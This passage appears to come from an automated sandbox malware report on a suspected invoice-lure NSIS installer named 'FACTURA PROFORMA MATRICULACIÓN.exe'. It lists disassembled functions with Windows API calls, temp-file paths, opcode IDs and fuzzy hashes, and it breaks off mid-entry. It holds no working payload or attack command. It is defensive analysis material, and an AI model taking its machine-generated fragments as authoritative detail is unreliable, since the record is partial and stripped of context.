                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 0040300B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                  • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                  • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                  • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                  Function 707E2655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 707E12BB: GlobalAlloc.KERNELBASE(00000040,?,707E12DB,?,707E137F,00000019,707E11CA,-000000A0), ref: 707E12C5
                                                  • GlobalFree.KERNEL32(?), ref: 707E2743
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E2778
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: b465f9fee4208f68f5078b72c9442aafbc05dc6cd38b158eed044f395e0a160f
                                                  • Instruction ID: a29f08a3a146a8ed3cc97b93fab06ca0b3f2400b6367e001428f03bf49815ab9
                                                  • Opcode Fuzzy Hash: b465f9fee4208f68f5078b72c9442aafbc05dc6cd38b158eed044f395e0a160f
                                                  • Instruction Fuzzy Hash: 0531EE72206106EFC7268F67CDCAD2E7BBAFB85344720466CF34287620C771AC069B65
                                                  Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                  • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                  • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                  • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                  • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                  Function 707E2480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E25C2
                                                    • Part of subcall function 707E12CC: lstrcpynW.KERNEL32(00000000,?,707E137F,00000019,707E11CA,-000000A0), ref: 707E12DC
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 707E2548
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 707E2563
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 4216380887-0
                                                  • Opcode ID: 8e29a3471dbbe63a91ce278df25aae878bc71103e929f0311292931773a70e60
                                                  • Instruction ID: 4bdcc042842f9bf44309eca352b1b1bfb9ff8e70b92b23e566c05e4758d57307
                                                  • Opcode Fuzzy Hash: 8e29a3471dbbe63a91ce278df25aae878bc71103e929f0311292931773a70e60
                                                  • Instruction Fuzzy Hash: FF4110B110634AEFD310DF26D986A2E77B8FB44310F2049ADF50687290EB70A952CB71
                                                  Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                  • GetClientRect.USER32(?,?), ref: 00401E0A
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                  • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                  • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                  • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                  • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                  Function 00401E73 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E76
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                  • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                  • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                  • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                  • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                  Function 707E16BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,707E22D8,?,00000808), ref: 707E16D5
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,707E22D8,?,00000808), ref: 707E16DC
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,707E22D8,?,00000808), ref: 707E16F0
                                                  • GetProcAddress.KERNEL32(707E22D8,00000000), ref: 707E16F7
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E1700
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: c24e82d92fb72a85e1879621096f5851c7504e77c7c5692690f5445a7f4cde15
                                                  • Instruction ID: 86eee06e6f54e024c68ddd5790ccae024c896364b1181fc1a603d7c2ee68c25a
                                                  • Opcode Fuzzy Hash: c24e82d92fb72a85e1879621096f5851c7504e77c7c5692690f5445a7f4cde15
                                                  • Instruction Fuzzy Hash: 0AF05E331071397BC62016A78C4CD9B7F9CDF8B2F5B110261F318911A085614C0187F5
                                                  Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                  • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                  • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                  • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                  Function 00404D6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                  • wsprintfW.USER32 ref: 00404E17
                                                  • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                  • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                  • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                  • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                  Function 00405F18 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,Baboodom111 Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,?,00405F2F,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405EC9
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405F71
                                                  • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nskBC9B.tmp
                                                  • API String ID: 3248276644-2153932574
                                                  • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                  • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                                  • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                  • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                                  Function 00405EBB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,?,00405F2F,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405EC9
                                                  • CharNextW.USER32(00000000), ref: 00405ECE
                                                  • CharNextW.USER32(00000000), ref: 00405EE6
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nskBC9B.tmp, xrefs: 00405EBC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp
                                                  • API String ID: 3213498283-3152796830
                                                  • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                  • Instruction ID: c2ae64a9e281e0169ab0b3f813724322829f62ec5c7d6721859fffd7401bb401
                                                  • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                  • Instruction Fuzzy Hash: 3AF0F631920A1296DB31B7548C58E7752BCEB94350B00843BD281B32C1D7FC49C18EED
                                                  Function 00403B7E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,77943420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                                  • GlobalFree.KERNEL32(005A2930), ref: 00403B9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: 0)Z$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-2264644079
                                                  • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                  • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                                  • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                  • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                                  Function 00405E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
